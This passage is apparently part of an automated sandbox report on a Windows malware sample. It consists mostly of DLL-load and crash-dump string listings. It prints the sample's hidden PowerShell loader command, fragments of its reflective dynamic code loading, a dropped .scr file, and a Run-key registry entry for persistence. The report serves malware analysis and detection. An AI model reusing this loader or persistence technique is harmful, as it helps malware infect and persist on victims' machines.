          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Flyverdragter.lnk.0.drLNK file: ..\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\triorchism\hvidte.pal
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: anziOUzZJs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: System.Configuration.Install.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.pdbTzQs source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: tion.pdb source: powershell.exe, 0000000A.00000002.2009656049.000000000816C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.pdbH source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.pdbc source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Core.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ServiceProcess.pdb` source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Numerics.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.pdb4X(w source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Transactions.ni.pdbRSDSc source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ServiceProcess.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.Install.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: stem.Core.pdb source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.pdbMZ@ source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb4' source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbu source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.Automation.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Windows.Forms.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.Automation.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Core.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Transactions.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.Install.pdbh source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb.> source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Transactions.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: em.Core.pdbM source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Numerics.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.pdb, source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr

          Data Obfuscation

          barindex
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Motherland $Deamidation $Highjacks), (Toozoo @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Direach = [AppDomain]::CurrentDomain.GetAssemblies()$global:So
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Antiklimakser)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Amtsgymnasiet, $false).DefineType($Skraasej
          Suspicious powershell command line found
          Source: C:\Users\user\Desktop\anziOUzZJs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"
          Source: C:\Users\user\Desktop\anziOUzZJs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08C3D6D1 push ebx; ret 10_2_08C3D6D2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08C36EF2 push dword ptr [ebx+esi*2]; iretd 10_2_08C36F18
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08C366F2 push es; retf 10_2_08C366F3
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08C3D69E push 53A2941Bh; ret 10_2_08C3D6AA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08C390B0 push 97920D78h; ret 10_2_08C390B5
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08C3CA0C push edx; ret 10_2_08C3CA0D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08C3B21D push F32D283Ch; retf 10_2_08C3B222
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08C3B62C push eax; ret 10_2_08C3B637
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08C36D61 push ss; ret 10_2_08C36D62
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08C3DF65 push ebx; ret 10_2_08C3DF72

          Persistence and Installation Behavior

          barindex
          Drops PE files with a suspicious file extension
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Partivarerne.scrJump to dropped file
          Uses cmd line tools excessively to alter registry or file data
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile created: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\BgImage.dllJump to dropped file
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile created: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsExec.dllJump to dropped file
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile created: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\nsDialogs.dllJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Partivarerne.scrJump to dropped file
          Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PreferentialistJump to behavior
          Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PreferentialistJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
